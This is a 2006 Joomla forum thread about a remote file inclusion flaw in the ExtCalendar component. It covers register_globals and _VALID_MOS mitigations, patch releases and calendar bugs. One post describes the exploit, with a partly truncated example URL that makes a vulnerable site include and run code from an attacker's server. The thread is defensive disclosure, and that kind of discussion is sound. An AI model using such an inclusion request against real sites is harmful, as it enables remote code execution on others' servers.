[UPGRADE AVAIL.] ExtCalendar Vulnerability

For all Non-Joomla! security issues. ie 3pd Components etc.

Moderator: General Support Moderators

Forum rules
Locked
Wil
Joomla! Intern
Joomla! Intern
Posts: 67
Joined: Thu Aug 18, 2005 1:47 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Wil » Sun Jul 23, 2006 8:22 am

Elpie wrote:
ssherlock wrote:
Slack wrote: Latest Events still needs to be fixed.

dpk, thanks for the "comment out" solution - dunno what effect it has, but at least the mini-calendar is running.
Would this be as simple as adding the following?
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
to the php files?
No. Adding that line would make it safer, but it would still be vulnerable.
Any chance that it will be fixed on short term?  :-[

exian
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sat Nov 05, 2005 4:20 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by exian » Sun Jul 23, 2006 9:40 pm

Rather than adding the _VALID_MOS check at the top of *EVERY* file, you could turn off the PHP setting register_globals. If you don't have access to the web host's php.ini, you may also be able to edit (if it exists) or create a file called .htaccess in Joomla's folder with the following contents:

php_value register_globals "0"

Note that this only works with Apache. ExtCalendar is not the only component affected. The phpBB2 bridge (com_forum) that I was using is also affected. I wouldn't be surprised if more crop up. I think the best solution is turning off register_globals.

If the component has a config file you could also add the following to it (assuming it's PHP):

if(strpos($mosConfig_absolute_path, '://')) {
  echo("Hack attempt detected!");
  exit;
}

This relies on the component including it's config file before anything else. Most do.

The exploit takes advantage of register_globals and allow_url_fopen being on, then goes to a page with: http://your.site.com/joomla/components/ ... er.com/xyz

Then any file that has include($mosConfig_absolute_path ."/some/file.php"); now includes the remote file in it's code. The attacker just creates a file called /some/file.php on their server and they can run anything they want right on your web server. I'm just saying a global solution is best.

---------------------
-- Ian
http://www.extrosoft.com

User avatar
SKv
Joomla! Apprentice
Joomla! Apprentice
Posts: 35
Joined: Tue Sep 20, 2005 5:28 pm
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by SKv » Mon Jul 24, 2006 10:07 am

Wil wrote: Any chance that it will be fixed on short term?  :-[
I am working on it. It's not that I am crazy about it but I have to do it.  ??? :'( :o :(

Any help will be appreciated.
Signature rules: Literal URLs only - http://forum.joomla.org/viewtopic.php?f=8&t=65

emma
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Mon Jul 17, 2006 11:30 am

Re: Rotating Banner Space

Post by emma » Mon Jul 24, 2006 2:27 pm

Hi Everyone,

I need some software for a top banner, and 5 on the left hand side of the site and seven boxes on the left.....

I would like them to all be rotating.

Can anyone suggest which software i should use? ???

Thanks,
Rgds, Emma

User avatar
sc00zy
Joomla! Exemplar
Joomla! Exemplar
Posts: 9532
Joined: Thu Aug 18, 2005 9:07 am
Location: Assen, Netherlands
Contact:

Re: Rotating Banner Space

Post by sc00zy » Mon Jul 24, 2006 3:07 pm

emma wrote: Hi Everyone,

I need some software for a top banner, and 5 on the left hand side of the site and seven boxes on the left.....

I would like them to all be rotating.

Can anyone suggest which software i should use? ???

Thanks,
Rgds, Emma
Hi Emma,

This topic is about ExtCalendar.

Make a new topic for your question please.
Arjan Menger
https://welldotcom.nl - Puntgaaf Internetbureau

koltz
Joomla! Intern
Joomla! Intern
Posts: 66
Joined: Mon Nov 07, 2005 4:05 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by koltz » Mon Jul 24, 2006 4:46 pm

Noticed a bug and didn't see it posted in this thread.  When viewing the calendar in Monthly View, and there are more than one event scheduled for that day, only one will be displayed multiple times, but if I click on daily view, it will then display fine.

This isn't just on my test site, but noticed it up on Riverwest Neighborhood's site:

http://www.riverwestneighborhood.org/co ... e,cal/lang,/

Corey

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Elpie » Mon Jul 24, 2006 5:52 pm

This patch was given some time ago to fix that (note, I haven't tried it so use at your own risk)

Line 79:

Code: Select all

$database->setQuery("SELECT MAX(id) FROM #__menu WHERE link LIKE '%index.php?option=com_extcalendar%' AND published <> '
-
2'");
Change to:

Code: Select all

$database->setQuery("SELECT id FROM #__components WHERE link LIKE '%option=com_extcalendar%'");
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

koltz
Joomla! Intern
Joomla! Intern
Posts: 66
Joined: Mon Nov 07, 2005 4:05 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by koltz » Mon Jul 24, 2006 6:23 pm

Thanks for the code.  What file?  Should be integrated (and checked) with the new version of this also since it is a bug.

Corey

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Elpie » Mon Jul 24, 2006 6:28 pm

Oops! Sorry, this is in mod_extcalendar_latest.php
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

koltz
Joomla! Intern
Joomla! Intern
Posts: 66
Joined: Mon Nov 07, 2005 4:05 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by koltz » Mon Jul 24, 2006 6:38 pm

Same thing :(

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Tue Jul 25, 2006 3:06 am

koltz wrote: Noticed a bug and didn't see it posted in this thread.  When viewing the calendar in Monthly View, and there are more than one event scheduled for that day, only one will be displayed multiple times, but if I click on daily view, it will then display fine.

This isn't just on my test site, but noticed it up on Riverwest Neighborhood's site:
http://www.riverwestneighborhood.org/co ... e,cal/lang,/
Corey
1. this does not need to be a bug. it could be setting related
2. please post this in 3rd party component board as a new thread because i think we should keep this thread to the ExtCalendar Vulnerability issue?

cheers
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Tue Jul 25, 2006 3:38 am

Elpie wrote: Oops! Sorry, this is in mod_extcalendar_latest.php
Lynne,
I have send David the files i am talking about....the mod_extcalendar_latest.php does has the direct access protection but still open (we think)
but the second one in the package is extcal_latest_func.php which lacks any protection and is as open as the ozon layer above "Down-Under" and Kiwi-Islands"  ;) So let's see where  Master-Dave comes up with  :-\

Take care (both of you :) )

Cheers
Leo
Last edited by leolam on Tue Jul 25, 2006 3:42 am, edited 1 time in total.
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

davidrrm
Joomla! Explorer
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Tue Jul 25, 2006 3:48 am

Yep, extcal_latest_func.php is missing the defined("_VALID_MOS") or die line, but it's saved by having only functions in it, so if it were accessed directly no code would run. I think every file should have that direct access check, just to make it easier for us to audit components, so it should be added when the module is updated. I also dislike that the file is included in mod_extcalendar_latest.php prior to the defined("_VALID_MOS") line. Again, this does not appear to be a security problem now, but the code might be changed later in a way that would cause a problem.

Thanks for pointing this out. That file's hidden pretty well there.

david

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Tue Jul 25, 2006 3:50 am

davidrrm wrote: Yep, extcal_latest_func.php is missing the defined("_VALID_MOS") or die line, but it's saved by having only functions in it, so if it were accessed directly no code would run. I think every file should have that direct access check, just to make it easier for us to audit components, so it should be added when the module is updated. I also dislike that the file is included in mod_extcalendar_latest.php prior to the defined("_VALID_MOS") line. Again, this does not appear to be a security problem now, but the code might be changed later in a way that would cause a problem.

Thanks for pointing this out. That file's hidden pretty well there.

david
dave,
according to some people who "claim" to be speicalist you might access the rest by utilizing this particulat file......your opinion?
cheers
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

davidrrm
Joomla! Explorer
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Tue Jul 25, 2006 4:15 am

Maybe it's because I'm up past my bedtime :-), but I don't see a way to get any code to run in that file. If someone accessed it directly, the file would be parsed but the only code in it is inside functions. There's no way to call those functions, so nothing would happen.

If the specialists have some more details about how an exploit might take advantage of it, I'd be interested in hearing it. As I mentioned, I think it's poor practice, but there doesn't appear to be a threat there.

david

deleted user

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by deleted user » Tue Jul 25, 2006 4:38 am

Elpie wrote: Oops! Sorry, this is in mod_extcalendar_latest.php
That can't be the correct file--it has nothing to do with the monthly displays. Plus, I don't even have this mod.

Time for a Reality Check: extCal is pretty but buggy and lacking in some major features that would make it really useful. Security fixes for it are nice, but who wants a secure, feature poor, buggy component?

I'm going to check out Events beta 1.3

User avatar
Elpie
Joomla! Guru
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Elpie » Tue Jul 25, 2006 8:24 am

dpk wrote: Time for a Reality Check: extCal is pretty but buggy and lacking in some major features that would make it really useful. Security fixes for it are nice, but who wants a secure, feature poor, buggy component?
Not you anyway  :laugh: A lot of people are using it and were upset to find it was vulnerable.  David *is* going to work on it but you need to remember that ExtCalendar was abandonware and nothing had been done with it for the best part of a year. We didn't set out to fix the bugs or add features. The fact that some bugs were fixed in the security update was really incidental.  Heck, the three who worked on this (with David doing most of it) don't even use ExtCalendar on our sites!! LOL
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

Ottobufonto
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 118
Joined: Tue Sep 06, 2005 10:53 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Ottobufonto » Tue Jul 25, 2006 9:47 am

davidrrm wrote: Yep, extcal_latest_func.php is missing the defined("_VALID_MOS") or die line, but it's saved by having only functions in it, so if it were accessed directly no code would run. I think every file should have that direct access check, just to make it easier for us to audit components, so it should be added when the module is updated. I also dislike that the file is included in mod_extcalendar_latest.php prior to the defined("_VALID_MOS") line. Again, this does not appear to be a security problem now, but the code might be changed later in a way that would cause a problem.

Thanks for pointing this out. That file's hidden pretty well there.
Well, back then there weren't many open discussion about component security and it was a patch never really made to go public
dpk wrote: Time for a Reality Check: extCal is pretty but buggy and lacking in some major features that would make it really useful. Security fixes for it are nice, but who wants a secure, feature poor, buggy component?

I'm going to check out Events beta 1.3
...

Reality check for who? Most people here use Extcal cause it has features they want - not cause there is no alternative. We all know that this project is not David's original work, not was it Scott and other David, nor Matt Friedman who made the fist mambo component.

Everybody that doesn't think Extcal meets their needs - please go and use something else! But please go quietly; otherwise stop complaining and start helping to improve the component.

People that where interested know that this version isn't even based on tha last beta of Extcal (which is alrady over a year old.
The Author is still working on it (very slowly though) and will hopefully publish a new beta some time soon.

Extcal has been adandonware on the Joomla/Mambo side for  along time. Maybe there are some good people ganging up as we speak to change that. IMHO the only way forward for a Joomla component is to get in contact with the original author and work off the latest code base and J10e (Joomla!ise) it. 

Edit: Apologies for OT post and polluting the thread.

Otto
Last edited by Ottobufonto on Tue Jul 25, 2006 10:16 am, edited 1 time in total.

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Tue Jul 25, 2006 10:04 am

All users do yourself a favor.....?

Please read back waht has been said and do not polute this thread....
Once agin here is the situation.........Many big vulnerabilities were discovered and many people have worked very hard to create a solution for thousands of very satisfied users of this calendar. Also go back a couple of posts where Elpie stated that something good might come out of this..so now just be unbelievable greatful to all these people guided by Elpie and David amongst many others who have tested the solutions as release (as i recall we had 3 or 4 overr the past week) which at the end resulted in a working calendar again. Now whether that ting is buggy or not is not relevant at this stage.....It is the most easiest calendar around and many people have been using it with lots of pleasure a have many of our customers.

So let's just wait and see what is coming out of it for beauty?

cheers  :)
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

Nightmunky
Joomla! Apprentice
Joomla! Apprentice
Posts: 20
Joined: Wed Feb 08, 2006 3:10 am

Re: ExtCalendar

Post by Nightmunky » Tue Jul 25, 2006 3:32 pm

mom2nine wrote:
I saw a calendar component today called Thyme that appears to be ported for Joomla.  Anyone have experience with it?  I'm running news and information sites, we HAVE to have an events calendar.  Never dreamed something like this would happen, especially since I'd upgraded to 1.10 in Joomla.  Just goes to show, it can happen anytime, anywhere.
There's a 'Thyme' topic here: http://forum.joomla.org/index.php/topic,54772.0.html

:)

technopuzzle
Joomla! Ace
Joomla! Ace
Posts: 1958
Joined: Thu Aug 18, 2005 5:53 pm
Location: Washington D.C. & Baltimore, MD Metro
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by technopuzzle » Thu Jul 27, 2006 2:50 am

Is there any timeline on if/when you most gracious and generious developers will "fix" the issues with the latests events module?

No pressue from me, but my wife is really pitching a fit since I unpublished it / renamed it / disabled it on our site.

Thanks again for all the hard work and bringing this great calendar component back from the dead.
Thanks,
Roger Raymond
Techno Puzzle

deleted user

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by deleted user » Fri Jul 28, 2006 6:07 am

Some people here are looking for solutions with an eye on the big picture: functional software.

Unfortunately, I have determined that ExtCal really is the best open source calendar that is available. There is no good alternative.

Yes it's great we have more secure version of ExtCal, but it remains a bug-laden, albeit pretty, POS. Denial doesn't make it better. Bugs are always relevant. Perhaps many people have enjoyed a buggy ExtCal, but I do not enjoy having mostly recurring events that ExtCal cannot handle, or multiple events per day, which will not display properly on the monthly view.

FYI, here is how to fix that last bug, which ought to be incorporated (with others mentioned earlier) into the latest file release:
http://forum.joomla.org/index.php?PHPSE ... 680.0.html
http://forum.joomla.org/index.php?topic=39582.msg321766

For the benefit of others who find or follow this thread looking for a good calendar system:

Events 1.3 is only marginally better than ExtCal. Its recurrent event options are badly organized, incomplete, and described in bad English that adds to the confusion. The author also appears not to have much familiarity with the mathematical peculiarities of the Gregorian calendar. Events List looks like the big winner with all kinds of extras, except it is more suited for club/entertainment notices and is now exclusively for Joomla. Thyme really appears to be the only quality calendar option; unfortunately it is a standalone commercial piece of software.

In the interest of being even more constructive, let me suggest that anyone developing ExtCal or any event calendar software first familiarize themselves with quality models: Thyme, Events List, and the simple and effective recurrent event concept in the interface for Microsoft Outlook.
Last edited by deleted user on Fri Jul 28, 2006 6:46 am, edited 1 time in total.

User avatar
Da3dalus
Joomla! Apprentice
Joomla! Apprentice
Posts: 17
Joined: Wed Nov 09, 2005 8:36 pm
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Da3dalus » Fri Jul 28, 2006 7:41 am

so what about ExcCal latest events module after all? we're waiting for it's security version passionately! :-*

davidrrm
Joomla! Explorer
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Fri Jul 28, 2006 9:53 am

My apologies, I thought this was posted already.

There is no known security issue with Ext calendar latest modulle. Yes, one file is missing the defined('_VALID_MOS') or die.. line, but that file consists entirely of functions so it has no code that will execute if called directly. Two of us have reviewed the code and while it may have other problems, a known security vulnerability is not one of them.

A version is being worked to improve it and we'll add that line to the file of functions just to make us all feel better, but in the meantime the previous release is fine (and I'll get it posted in the new project on the Forge when I get a spare minute).

If anyone has knowledge of a security vulnerability, please PM me with the details and we'll investigate.

david

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Fri Jul 28, 2006 10:05 am

davidrrm wrote: My apologies, I thought this was posted already.
If anyone has knowledge of a security vulnerability, please PM me with the details and we'll investigate.
david
David,
The reason for me raising the alarm a couple of pages ago in this thread was the fact that the main file latest_extcalendar.php or so whatever the name is was NOT having the ('_VALID_MOS') or die.. line incorporated on two of our client sites! I do concur that the functions in the other file do not post a security thread itself after renewed consultations with the php-guys but as you stipulate the file could be hammered tied with some extra's as you are working on..I do think it is a good idea to post the file-version of mod_extcalendar_latest.php  you have just here as an attachment  (not the module) for people to overwrite their current version just to be sure that they all have the latest "more-or-less-secure" version. Sounds like a plan?  ;)

cheers
Leo
Last edited by leolam on Fri Jul 28, 2006 10:16 am, edited 1 time in total.
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

davidrrm
Joomla! Explorer
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Fri Jul 28, 2006 11:58 am

In the two versions (numbered .5 and .7.2.5) I looked at the main file was fine. In .7.2.5 there's a function file that does not have the line, but is ok since it only has functions. If it increases everyone's feeling of security I'll update the function file and post it here. I'll do that in a few hours, I want to double check that it works with that change (I'm 99.999999% sure that it does, but I just want to be certain).

david

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Fri Jul 28, 2006 1:30 pm

davidrrm wrote: In the two versions (numbered .5 and .7.2.5) I looked at the main file was fine. In .7.2.5 there's a function file that does not have the line, but is ok since it only has functions. If it increases everyone's feeling of security I'll update the function file and post it here. I'll do that in a few hours, I want to double check that it works with that change (I'm 99.999999% sure that it does, but I just want to be certain).
david
With all respect with all you hav edone for this community (I so applaude you!)....The function file you talk about is extcal_latest_func.php This is not where i talked about...i suggested (!) to publish here "mod_extcalendar_latest.php" to secure people's emotions....Nothng wrong to insert the ('_VALID_MOS') or die.. line into the other file: extcal_latest_func.php  so again with all respect where do you need to be sure about?  ;)

cheers
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

mwep
Joomla! Apprentice
Joomla! Apprentice
Posts: 13
Joined: Wed Mar 01, 2006 9:05 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by mwep » Fri Jul 28, 2006 2:23 pm

Thanks for helping to resolve the vulernabilities in ExtCal!

We are somewhat confused after reading the thread...

Is ExtCal Latest Events safe or should we remove it ?

Thanks!!!

davidrrm
Joomla! Explorer
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Fri Jul 28, 2006 2:49 pm

I think there may be three versions running around, two which I've seen and one which I haven't but leolam has. If you feel comfortable looking through PHP code, you're looking for the line that starts

defined('_VALID_MOS') or die(

This should be in the mod_extcalendar_latest.php file. If it's there - great - if it's not, you do have a vulnerability.

If you don't want to do that and want to be on the safe side, I'd suggest removing the mod_extcalendar_latest for now (you must remove it, just unpublishing it doesn't do anything).

We'll hopefully have the definitely secure module shortly (i.e. within a day or two).

david

davidrrm
Joomla! Explorer
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Fri Jul 28, 2006 6:53 pm

Thanks to Otto's work we have a new mod_extcalendar_latest that has the check for _VALID_MOS at the top of each file, and fixes a few bugs.

- fix for artf3004 / artf3555 - fix for non-registered users (not authorized to ...)
- fix for artf3455 - problem with stipping bb code from event description
- fix for artf4535 - shows all day events in advance

This is available on the new ExtCalendar project site on JoomlaForge - http://developer.joomla.org/sf/projects/extcalendar.

Many thanks to Otto for his work on this.

david


Locked

Return to “3rd Party/Non Joomla! Security Issues”